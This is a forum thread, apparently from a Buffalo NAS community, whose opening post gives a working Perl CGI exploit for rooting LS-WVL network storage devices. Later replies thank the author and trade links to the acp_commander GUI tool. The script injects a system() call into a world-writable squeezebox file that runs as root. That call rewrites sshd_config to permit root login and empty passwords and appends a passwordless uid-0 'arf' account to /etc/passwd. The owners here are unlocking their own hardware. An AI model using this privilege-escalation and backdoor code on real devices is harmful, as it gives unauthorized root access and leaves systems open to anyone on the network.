Buffalo NAS-Central Forums

Welcome to the Linkstation Wiki community
It is currently Wed Jun 20, 2018 11:33 pm

All times are UTC+01:00




Post new topic  Reply to topic  [ 11 posts ] 
Author Message
PostPosted: Mon Aug 19, 2013 9:59 pm 
Offline
Total Newbie

Joined: Mon Aug 19, 2013 9:02 pm
Posts: 1
I read through the different ways to get root access for the LS-WVL series and none of them were working for me
(The acp_commander.jar method kept spitting out that socket error:
"ERROR: Exception: SocketTimeoutException (Receive timed out) [ACP Send/Receive (Packet:8020 = ACP_Discover)]"
and told me to check the firewall, which I'm pretty sure wasn't causing the problem.)

Instead of figuring out why those acp_commander.jar UDP packets weren't going through, I looked for another way to root the damn thing.

Turns out all the files in /usr/local/squeezebox/ are world-writable, and one of them (slimserver.pl) gets ran as root when you start or restart the squeezebox service.
So to exploit this (and to make it easier for others), I wrote up a quick CGI script that does most of the work for you (PHP would have worked too, but I like perl more :-P).

Login to the device's web server and goto "Network" -> "Web Server" to start up that other webserver on port 81. Point that webserver to your share folder, and mount it via SMB like you normally would. When you start that web server for the first time it'll create the folders "htdocs", "cgi-bin", and "log". Goto the empty "cgi-bin" folder and create a text file called "root.cgi". Copy/paste the following code into that newly created "root.cgi":

Code:
#!/usr/bin/perl
$data=`cat /usr/local/squeezebox/slimserver.pl`;
$data=~s!for more details\..*!for more details\.\nsystem(qq(sed -e's/.*PermitRootLogin.*/PermitRootLogin yes/' -e's/.*PermitEmptyPasswords.*/PermitEmptyPasswords yes/' -e's/.*PasswordAuthentication.*/PasswordAuthentication yes/' -i /etc/sshd_config;echo arf::0:0::/:/bin/bash >> /etc/passwd;/etc/init.d/sshd.sh restart));\n!;
open(SLIM,">/usr/local/squeezebox/slimserver.pl") or die "Error: Can't write to /usr/local/squeezebox/slimserver.pl: $!\n";
print SLIM $data . "\n";
close(SLIM);
print "Start or restart squeezebox now\nAfterwards, you should be able to login via SSH using the username 'arf' and a blank password\n";
print "(When you're done, be sure to remove the 'arf' user from /etc/passwd and to remove that one 'system(qq(' line from /usr/local/squeezebox/slimserver.pl)\n";


Once you've saved that as "root.cgi" in the "cgi-bin" folder goto http://YOURNASIP:81/cgi-bin/root.cgi
After that, start or restart the squeezebox service under "Extensions" -> "MediaServer" -> "Squeezebox Server".
Now you should be able to login to the NAS via SSH using the username 'arf' and no password.
(if sshd won't restart for some reason, just reboot the whole device and you should still be able to login with the username 'arf' and a blank password).

From there you can read the other tutorials around here about changing root's password or generating your own ssh keys.


Top
   
PostPosted: Sun Dec 08, 2013 6:40 pm 
Offline
Total Newbie

Joined: Fri Sep 27, 2013 7:18 pm
Posts: 1
just wanted to thank for this guide and confirm that it worked for me, too (LS-WVL).


Top
   
PostPosted: Wed Jan 01, 2014 7:38 am 
Offline
Total Newbie

Joined: Wed Jan 01, 2014 7:37 am
Posts: 1
Thank you. worked like a charm. I did this with LS-WVL/E (diskless).


Top
   
PostPosted: Wed Jan 01, 2014 2:57 pm 
Offline
Newbie

Joined: Sat Apr 20, 2013 10:40 am
Posts: 22
For any future readers..... acp_commander_gui will also work. It's a gui version of acp_commander which only requires that the Java Run-time Environment (JRE) be installed.

You can google that name for a link or go directly to the download: http://www.gry.ch/Java/styled/

I couldn't get the .jar file method to work for me either (though the error was different), but this gui version of it worked perfectly on my LS-WVL and TS-XEL.


Top
   
PostPosted: Tue Jan 21, 2014 9:57 pm 
Offline
Newbie

Joined: Tue Jan 21, 2014 9:37 pm
Posts: 6
TheSidewinder wrote:
For any future readers..... acp_commander_gui will also work. It's a gui version of acp_commander which only requires that the Java Run-time Environment (JRE) be installed.
You can google that name for a link or go directly to the download: http://www.gry.ch/Java/styled/


Thank you thank you thank you :up:
The gui works sweet and simple on my LS-WVA/E.

JoBo


Top
   
PostPosted: Fri Jan 31, 2014 7:00 am 
Offline
Newbie

Joined: Fri Jan 31, 2014 6:53 am
Posts: 7
I would like to thank you for the new way to root.
unfortunately for some reason it doesn't work for me, I keep getting SSH session refused although the script seems to be executed successfully, I am not sure what went wrong.

just to make it clear for my self, I should have the web server and squeeze box running on the same folder? I have 1.64 firmware on LS-WVL/E

I tried to download the acp_commander GUI but it seems the website is down, would any one have the file and maybe can share it?

Thank you


Top
   
PostPosted: Mon Feb 03, 2014 2:20 pm 
Offline
Newbie

Joined: Tue Jan 21, 2014 9:37 pm
Posts: 6
I "think" I just sent it.

If you still need it and didn't get it let me know.

JoBo


Top
   
PostPosted: Tue Feb 04, 2014 9:10 am 
Offline
Total Newbie

Joined: Tue Feb 04, 2014 9:07 am
Posts: 1
Can you send it to me too? I tried the main site and it is still dead and another mirror website is working but the download links are dead :cry:

Appreatiate your help


Top
   
PostPosted: Tue Feb 04, 2014 7:28 pm 
Offline
Newbie

Joined: Fri Jan 31, 2014 6:53 am
Posts: 7
JoBo wrote:
I "think" I just sent it.

If you still need it and didn't get it let me know.

JoBo


I still didn't get it unfortunately :?


Top
   
PostPosted: Sat Feb 08, 2014 12:16 am 
Offline
Newbie

Joined: Sat Apr 20, 2013 10:40 am
Posts: 22
Dunno how long the link will be good, but it can be found here now.

http://advanxer.com/blog/2013/02/buffal ... ander-gui/


Top
   
PostPosted: Sun Feb 23, 2014 1:19 pm 
Offline
Newbie

Joined: Tue Jan 21, 2014 9:37 pm
Posts: 6
Shomar and HYP

check your in boxes :mrgreen:


Top
   
Display posts from previous:  Sort by  
Post new topic  Reply to topic  [ 11 posts ] 

All times are UTC+01:00


Who is online

Users browsing this forum: No registered users and 3 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
cron
Powered by phpBB® Forum Software © phpBB Limited